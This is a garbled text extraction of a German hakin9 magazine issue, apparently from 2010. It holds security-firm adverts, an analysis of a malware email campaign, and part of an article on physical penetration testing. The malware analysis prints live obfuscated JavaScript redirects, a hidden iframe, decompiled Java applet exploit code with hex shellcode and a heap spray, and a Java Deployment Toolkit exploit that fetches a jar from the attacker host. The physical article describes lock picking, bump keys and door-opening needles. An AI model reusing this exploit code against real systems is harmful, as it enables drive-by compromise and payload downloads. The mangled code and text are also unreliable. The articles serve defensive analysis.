Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
